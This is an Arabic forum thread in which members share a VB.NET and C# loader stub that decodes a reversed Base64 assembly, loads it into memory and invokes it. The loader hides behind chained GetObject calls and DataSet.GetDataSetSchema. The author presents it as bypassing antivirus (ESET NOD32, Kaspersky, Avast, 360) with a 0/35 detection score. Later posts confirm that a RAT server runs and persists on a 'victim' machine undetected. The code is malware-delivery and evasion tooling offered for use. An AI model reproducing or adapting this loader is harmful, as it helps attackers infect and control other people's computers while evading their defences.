{فكرة جديدة} نقطة أدخال نظيفة بنتيجة (0/35) وتخطي جميع الدفاعات الأستباقية {عودة بيس 64}

تم تحميل الصفحة في 1,2681498 ثانية
{فكرة جديدة} نقطة أدخال نظيفة بنتيجة (0/35) وتخطي جميع الدفاعات الأستباقية {عودة بيس 64}
إنضم
15 نوفمبر 2017
المشاركات
183
الإعجابات
241
النقاط
53
السلام عليكم ورحمة الله وبركاته

رجعتلكم بموضوع جديد وفكرة جديدة وأن شالله تعجبكم

قمت بعمل لكم نقطة أدخال بأفكار جديدة ومن خلالها تستطيع تخطي الدفاعات الأستباقية
حتى مع قيم بيس 64 يعني لو أستخدمة قيم بيس 64 معها تعطيك نتيجة 0/35
وغير ذلك أنها تقوم بتخطي الدفاع الأستباقي للكثير من الحمايات
الحمايات التي قمت بالتجربة عليها
Eset Node32 + KasperSky + 360 Total + Avast
تم تخطي الدفاعات الأستباقية بنجاح حتى مع التثبيت في الستارت اب
وأيضا تم تخطي فحص الذاكرة في حماية النود بنجاح وبدون أي مشاكل

الآن خلينا نشوف شو فكرة نقطة الأدخال :

قمت بالأعتماد على هذا الأمر System.Data.DataSet.GetDataSetSchema

بهدف عمل تشتيت للحمايات عند عملية أستدعاء الـ(Load)

ثم قمت بالأعتماد أيضا على دالة (GetObject)
لأستدعاء الأمر الثاني وهو المسؤول عن أستدعاء اللود وتحميل السيرفر في الذاكرة
ثم قمت بعمل أكثر من أستدعاء بالأعتماد على دالة (GetObject)
و قمت بأستدعاء آخر متغير وهو المسؤول عن أستدعاء الأمر الذي قبله يعني تقدر تقول القصة هي أستدعائات متسلسلة
طبعاّ جميع ما فعلناه الآن هو خارج نطاق (Sub Main)
الآن نرجع لـSub Main لانه لم نضع شيء بها وهكذا من المستحيل أن يعمل السيرفر الخاص بنا
نروح لـ (Sub Main) نقوم بعمل متغير جديد مسؤول عن أستدعاء المتغير H9 المسؤول عن أستدعاء ما قبله
الفكرة بسيطة وقوية من خلالها أستطعنا الوصول الى نتيجة كلين حتى مع قيم بيس 64 المكشوفة من الكثير من الحمايات
دون التعديل على القيم بأي شكل من الأشكال فقط قمت بعمل عكس للقيم الهدف منه تخطي حماية الأفيرا لأنه تقوم بكشف الواجهة الشكلية لقيم بيس 64 وبدون عكس قيم يكون فقط مكشوف من حماية واحدة وهي الأفيرا يعني لا بأس

نتيجة الفحص :

Results | Metadefender.com


فيديو تخطي الدفاع الأستباقي وفحص الذاكرة في حماية (Node32) آحر تحديث بأستخدام نقطة الأدخال هذه مع قيم بيس 64


يمكن بعض الناس ما فهمت كلامي الي قلته لأنه الفكرة شوي معقدة
وحتى تقدر تفهم الفكرة أكثر شوف الكود بنفسك وأذا تحب عدل عليه براحتك

كود Visual Basic
Module Module1
    Dim A1 = System.AppDomain.CurrentDomain.Load(Convert.FromBase64String(StrReverse("")))
    Dim B2 = System.Data.DataSet.GetDataSetSchema(A1.EntryPoint.Invoke(B4 + B5 + B6 + B7 + B8 + B9 + B0, B3))
    Dim H1 = GetObject(B2)
    Dim H2 = GetObject(H1)
    Dim H3 = GetObject(H2)
    Dim H4 = GetObject(H3)
    Dim H5 = GetObject(H4)
    Dim H6 = GetObject(H5)
    Dim H7 = GetObject(H6)
    Dim H8 = GetObject(H7)
    Dim H9 = GetObject(H8)
    Sub Main()
'Coded By Salem Mahmoud
        Dim H0 = H9
    End Sub
    Public B3 = New Object(-+1) {}
    Public B4 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "N")
    Public B5 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "o")
    Public B6 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "t")
    Public B7 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "h")
    Public B8 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "i")
    Public B9 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "n")
    Public B0 = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||".Replace("|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||", "g")
End Module


في أمان الله
 
التعديل الأخير:

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,493
الإعجابات
8,481
النقاط
173
الإقامة
Germany
شرح قوي اخي الحبيب ماشاء الله عليك ..يوشم ويثبت
طريقة جميلة بتغيير طريقة استدعاء الانتري بوينت
السترينج ريفيرس ايضا ساهم بنتيجة الكلين اعتقد..
وعشان الدفاعات الاستباقية اعتقد دالة GetObject ساهمت ايضا بالتشتيت
اتمنى لك كل خير اخي الحبيب وان نرى المزيد والمزيد من ابداعاتك
ايضا في قسم الحماية ..
سؤال اخي الحبيب خارج الفديو جربت انك تجيب العمليات وماجلدك النود .؟
اعتقد لو بتجيب البروسس بجهاز الضحية بجيبك النود ولو باشعار ..
فقط سؤال جانبي ان كنت جربت انك تجيب العمليات وتقتل شي عملية
ومارح يتحرك النود لو لا

@Bashar Bachir

شوف الموضوع برو إذا فاضي :D

بس بدنا نقطة ادخال بل C# :$
نقطة الادخال هيه نفسها ماتغيرت اخي هنا بالموضوع هذا
اللي تغير طريقة استدعاءها لااكثر ..مثل مصار بالمواضيع اللي نزلت من الاخ قتيبة ومني
هنا طريقة جديدة تماما مااعتقد احد طرحها قبل ..
تفضل هي نقطة الادخال بالسي شارب
كود C#
System.Data.DataSet.GetDataSetSchema(System.AppDomain.CurrentDomain.Load(Convert.FromBase64String("")).EntryPoint.Invoke(null, null) as XmlSchemaSet);


وبالامكان تعقيدها اكثر وقت اللزوم
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,493
الإعجابات
8,481
النقاط
173
الإقامة
Germany
@Bashar Bachir

شوف الموضوع برو إذا فاضي :D

بس بدنا نقطة ادخال بل C# :$
+
هنا نقطة الادخال الاخرى ان حبيت
كود C#
System.Data.DataSet.GetDataSetSchema(System.Reflection.Assembly.Load(Convert.FromBase64String("")).EntryPoint.Invoke(null,null) as XmlSchemaSet);
 
إنضم
15 نوفمبر 2017
المشاركات
183
الإعجابات
241
النقاط
53
شرح قوي اخي الحبيب ماشاء الله عليك ..يوشم ويثبت
طريقة جميلة بتغيير طريقة استدعاء الانتري بوينت
السترينج ريفيرس ايضا ساهم بنتيجة الكلين اعتقد..
وعشان الدفاعات الاستباقية اعتقد دالة GetObject ساهمت ايضا بالتشتيت
اتمنى لك كل خير اخي الحبيب وان نرى المزيد والمزيد من ابداعاتك
ايضا في قسم الحماية ..
سؤال اخي الحبيب خارج الفديو جربت انك تجيب العمليات وماجلدك النود .؟
اعتقد لو بتجيب البروسس بجهاز الضحية بجيبك النود ولو باشعار ..
فقط سؤال جانبي ان كنت جربت انك تجيب العمليات وتقتل شي عملية
ومارح يتحرك النود لو لا



نقطة الادخال هيه نفسها ماتغيرت اخي هنا بالموضوع هذا
اللي تغير طريقة استدعاءها لااكثر ..مثل مصار بالمواضيع اللي نزلت من الاخ قتيبة ومني
هنا طريقة جديدة تماما مااعتقد احد طرحها قبل ..
تفضل هي نقطة الادخال بالسي شارب
كود C#
System.Data.DataSet.GetDataSetSchema(System.AppDomain.CurrentDomain.Load(Convert.FromBase64String("")).EntryPoint.Invoke(null, null) as XmlSchemaSet);


وبالامكان تعقيدها اكثر وقت اللزوم
والله بصراحة أخي أنا ما جربت هالشيء لكن الآن رح أجرب ورح أرد لك خبر سريع أن شالله وشكرا لمرورك صديقي :164:
 
إنضم
15 نوفمبر 2017
المشاركات
183
الإعجابات
241
النقاط
53
شرح قوي اخي الحبيب ماشاء الله عليك ..يوشم ويثبت
طريقة جميلة بتغيير طريقة استدعاء الانتري بوينت
السترينج ريفيرس ايضا ساهم بنتيجة الكلين اعتقد..
وعشان الدفاعات الاستباقية اعتقد دالة GetObject ساهمت ايضا بالتشتيت
اتمنى لك كل خير اخي الحبيب وان نرى المزيد والمزيد من ابداعاتك
ايضا في قسم الحماية ..
سؤال اخي الحبيب خارج الفديو جربت انك تجيب العمليات وماجلدك النود .؟
اعتقد لو بتجيب البروسس بجهاز الضحية بجيبك النود ولو باشعار ..
فقط سؤال جانبي ان كنت جربت انك تجيب العمليات وتقتل شي عملية
ومارح يتحرك النود لو لا



نقطة الادخال هيه نفسها ماتغيرت اخي هنا بالموضوع هذا
اللي تغير طريقة استدعاءها لااكثر ..مثل مصار بالمواضيع اللي نزلت من الاخ قتيبة ومني
هنا طريقة جديدة تماما مااعتقد احد طرحها قبل ..
تفضل هي نقطة الادخال بالسي شارب
كود C#
System.Data.DataSet.GetDataSetSchema(System.AppDomain.CurrentDomain.Load(Convert.FromBase64String("")).EntryPoint.Invoke(null, null) as XmlSchemaSet);


وبالامكان تعقيدها اكثر وقت اللزوم
أخي تم التجربة قمت بقتل أكثر من عملية عن طريق بروسيس النجرات نفسه وأستخدمة أكثر من خاصية أخرى وما زال النود نائم والسيرفر شغال والتثبيتات موجودة بدون مشاكل جرب بنفسك وشوف :50:
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,493
الإعجابات
8,481
النقاط
173
الإقامة
Germany
أخي تم التجربة قمت بقتل أكثر من عملية عن طريق بروسيس النجرات نفسه وأستخدمة أكثر من خاصية أخرى وما زال النود نائم والسيرفر شغال والتثبيتات موجودة بدون مشاكل جرب بنفسك وشوف :50:
كلامك ثقة اخي الحبيب
اهنيك على الطريقة ..قوية بالفعل دام ان الكلاينت خام ومش معدل عليه ابدا
فطريقتك قوية جدا
اتمنى لك كل خير اخي ..في انتظار جديد ابداعاتك
 
إنضم
15 نوفمبر 2017
المشاركات
183
الإعجابات
241
النقاط
53
كلامك ثقة اخي الحبيب
اهنيك على الطريقة ..قوية بالفعل دام ان الكلاينت خام ومش معدل عليه ابدا
فطريقتك قوية جدا
اتمنى لك كل خير اخي ..في انتظار جديد ابداعاتك[/QUOTE
لا أخي يوجد شيء واحد مختلف قمت بتغيير مفتاح تشفير الأتصال فقط
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,493
الإعجابات
8,481
النقاط
173
الإقامة
Germany
لا أخي يوجد شيء واحد مختلف قمت بتغيير مفتاح تشفير الأتصال فقط
حلو اللي سويته وقوي اخي مهما كان الامر ..
اتمنى لك كل خير ومزيد من الابداع اخي الحبيب
واصل وان شاء الله انا والشباب رح ندعمك ورح تاخذ مواضيعك حقها باذن الله
اتمنى انك تزورنا بقسم الحماية ان عندك افكار هنالك ..
 
إنضم
15 نوفمبر 2017
المشاركات
183
الإعجابات
241
النقاط
53
حلو اللي سويته وقوي اخي مهما كان الامر ..
اتمنى لك كل خير ومزيد من الابداع اخي الحبيب
واصل وان شاء الله انا والشباب رح ندعمك ورح تاخذ مواضيعك حقها باذن الله
اتمنى انك تزورنا بقسم الحماية ان عندك افكار هنالك ..
تسلم أخي وأنا بعرف ما بتقصروا والله و أن شالله عن قريب رح أنزل مواضيع بقسم الحماية بس بدي اسئلك أنا هسا جديد بالمنتدى كيف بدي أقدر أتواصل مع حدا من المشرفين أو الأداريين في هذا القسم أو قسم آخر
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,493
الإعجابات
8,481
النقاط
173
الإقامة
Germany
تسلم أخي وأنا بعرف ما بتقصروا والله و أن شالله عن قريب رح أنزل مواضيع بقسم الحماية بس بدي اسئلك أنا هسا جديد بالمنتدى كيف بدي أقدر أتواصل مع حدا من المشرفين أو الأداريين في هذا القسم أو قسم آخر
على الاغلب الصفحات الشخصية للمشرفين بتكون مفتوحة مثلا ان ضغطت على اسمي رح يطلعلك صورة مصغرة من معلومات عضويتي ان ضغطت مرة ثانية على اسمي رح ياخذك لصفحتي الشخصية
https://www.dev-point.com/vb/members/112121/
بالحائط امامك بامكانك تكتب لي "طبعا انا موقف هالخاصية مؤقتا مارح تقدر تكتب"
بس بامكانك التجريب على اي عضو هنا رح تشوف الحائط مفتوح امامك للكتابة عليه اخي
وان حابب القصة تكون مش على العام
بس تفوت على البروفايل هنالك تبويب يسمى معلومات
اضغط عليه وانزل لتحت شوي رح تشوف خيار اسمه بدء المحادثة
اضغط عليه ورح يظهر لك فورم ارسال رسالة خاصة بتكتب عنوان ومحتوى الرسالة وبترسلها
هذا بخصوص التواصل مع اي عضو او مشرف بالطريقة هذه
بس ان كان هنالك شكوى ما مثلا عن مشاركة او موضوع يكفي الضغط على زر تبليغ اسفل كل مشاركة
وكتابة سبب التبليغ او ماتريده ..وقتها مشرفي القسم بشوفو بلاغك اخي
او ان حبيت تتواصل مع الادارة هنالك قسم خاص لذلك
https://www.dev-point.com/vb/forums/185/
 
إنضم
15 نوفمبر 2017
المشاركات
183
الإعجابات
241
النقاط
53
على الاغلب الصفحات الشخصية للمشرفين بتكون مفتوحة مثلا ان ضغطت على اسمي رح يطلعلك صورة مصغرة من معلومات عضويتي ان ضغطت مرة ثانية على اسمي رح ياخذك لصفحتي الشخصية
https://www.dev-point.com/vb/members/112121/
بالحائط امامك بامكانك تكتب لي "طبعا انا موقف هالخاصية مؤقتا مارح تقدر تكتب"
بس بامكانك التجريب على اي عضو هنا رح تشوف الحائط مفتوح امامك للكتابة عليه اخي
وان حابب القصة تكون مش على العام
بس تفوت على البروفايل هنالك تبويب يسمى معلومات
اضغط عليه وانزل لتحت شوي رح تشوف خيار اسمه بدء المحادثة
اضغط عليه ورح يظهر لك فورم ارسال رسالة خاصة بتكتب عنوان ومحتوى الرسالة وبترسلها
هذا بخصوص التواصل مع اي عضو او مشرف بالطريقة هذه
بس ان كان هنالك شكوى ما مثلا عن مشاركة او موضوع يكفي الضغط على زر تبليغ اسفل كل مشاركة
وكتابة سبب التبليغ او ماتريده ..وقتها مشرفي القسم بشوفو بلاغك اخي
او ان حبيت تتواصل مع الادارة هنالك قسم خاص لذلك
https://www.dev-point.com/vb/forums/185/
طيب وبالنسبة لقسم الحماية شو المواضيع الي بقدر أطرحها لأنه ما بدي أنشر شيء أخذ مخالفة عليه وبصراحة قرأت القوانين والشروط ما أستفدت شيء أنا بس بدي أعرف شو المواضيع الذي أستطيع طرحها
 
إنضم
15 نوفمبر 2017
المشاركات
183
الإعجابات
241
النقاط
53

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 1 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل